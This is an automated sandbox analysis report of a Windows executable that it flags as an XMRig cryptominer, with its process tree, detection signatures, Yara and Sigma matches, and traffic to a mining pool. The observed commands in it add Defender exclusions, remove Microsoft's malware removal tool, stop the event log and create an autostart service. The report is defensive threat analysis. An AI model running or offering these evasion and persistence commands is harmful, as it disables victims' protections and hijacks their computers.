Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rtYpMDeKUq.exe

Overview

General Information

Sample name:rtYpMDeKUq.exe
renamed because original name is a hash value
Original sample name:3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3.exe
Analysis ID:1556039
MD5:9b1749c1bb9e8a354404b8a57de68ec6
SHA1:4c8838d22efc926551be0e77ecd1e6a68e15f6c4
SHA256:3829cf00079dd383532ac6637444081a9752f77d186dbdcbafcc44ddde0d9cf3
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rtYpMDeKUq.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\rtYpMDeKUq.exe" MD5: 9B1749C1BB9E8A354404B8A57DE68EC6)
    • powershell.exe (PID: 2796 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5848 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6208 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2044 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5888 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6848 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5236 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2708 cmdline: C:\Windows\system32\sc.exe delete "TASJBGYW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3160 cmdline: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6208 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5784 cmdline: C:\Windows\system32\sc.exe start "TASJBGYW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lzsbffridksl.exe (PID: 7148 cmdline: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe MD5: 9B1749C1BB9E8A354404B8A57DE68EC6)
    • powershell.exe (PID: 3800 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4444 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 6696 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6848 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5072 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4352 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 5588 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            38.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              38.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x370008:$a1: mining.set_target
              • 0x362230:$a2: XMRIG_HOSTNAME
              • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
              • 0x362208:$a4: XMRIG_VERSION
              38.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              38.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
              • 0x3b9600:$s3: \\.\WinRing0_
              • 0x3671a8:$s4: pool_wallet
              • 0x3615d8:$s5: cryptonight
              • 0x3615e8:$s5: cryptonight
              • 0x3615f8:$s5: cryptonight
              • 0x361608:$s5: cryptonight
              • 0x361620:$s5: cryptonight
              • 0x361630:$s5: cryptonight
              • 0x361640:$s5: cryptonight
              • 0x361658:$s5: cryptonight
              • 0x361668:$s5: cryptonight
              • 0x361680:$s5: cryptonight
              • 0x361698:$s5: cryptonight
              • 0x3616a8:$s5: cryptonight
              • 0x3616b8:$s5: cryptonight
              • 0x3616c8:$s5: cryptonight
              • 0x3616e0:$s5: cryptonight
              • 0x3616f8:$s5: cryptonight
              • 0x361708:$s5: cryptonight
              • 0x361718:$s5: cryptonight

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2044, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
              Sigma detected: Suspect Svchost Activity
              Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto", ProcessId: 3160, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2796, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentImage: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe, ParentProcessId: 7148, ParentProcessName: lzsbffridksl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5588, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\rtYpMDeKUq.exe", ParentImage: C:\Users\user\Desktop\rtYpMDeKUq.exe, ParentProcessId: 6936, ParentProcessName: rtYpMDeKUq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6208, ProcessName: sc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeReversingLabs: Detection: 65%
              Multi AV Scanner detection for submitted file
              Source: rtYpMDeKUq.exeReversingLabs: Detection: 65%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Found strings related to Crypto-Mining
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: svchost.exeString found in binary or memory: cryptonight/0
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: rtYpMDeKUq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp
              Source: global trafficTCP traffic: 192.168.2.8:49704 -> 54.37.232.103:10343
              Source: Joe Sandbox ViewIP Address: 54.37.232.103 54.37.232.103
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
              Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
              Source: svchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E1394 NtOpenFile,0_2_00007FF75E8E1394
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD201394 NtAllocateVirtualMemory,24_2_00007FF6CD201394
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 NtRecoverResourceManager,35_2_0000000140001394
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeFile created: C:\Windows\TEMP\jvocdauqvwbp.sysJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_lp2ylgtl.uzo.ps1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E3B500_2_00007FF75E8E3B50
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD203B5024_2_00007FF6CD203B50
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_000000014000315035_2_0000000140003150
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_00000001400026E035_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\jvocdauqvwbp.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: String function: 00007FF6CD201394 appears 33 times
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: String function: 00007FF75E8E1394 appears 33 times
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 38.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: svchost.exe PID: 5588, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@56/12@1/1
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
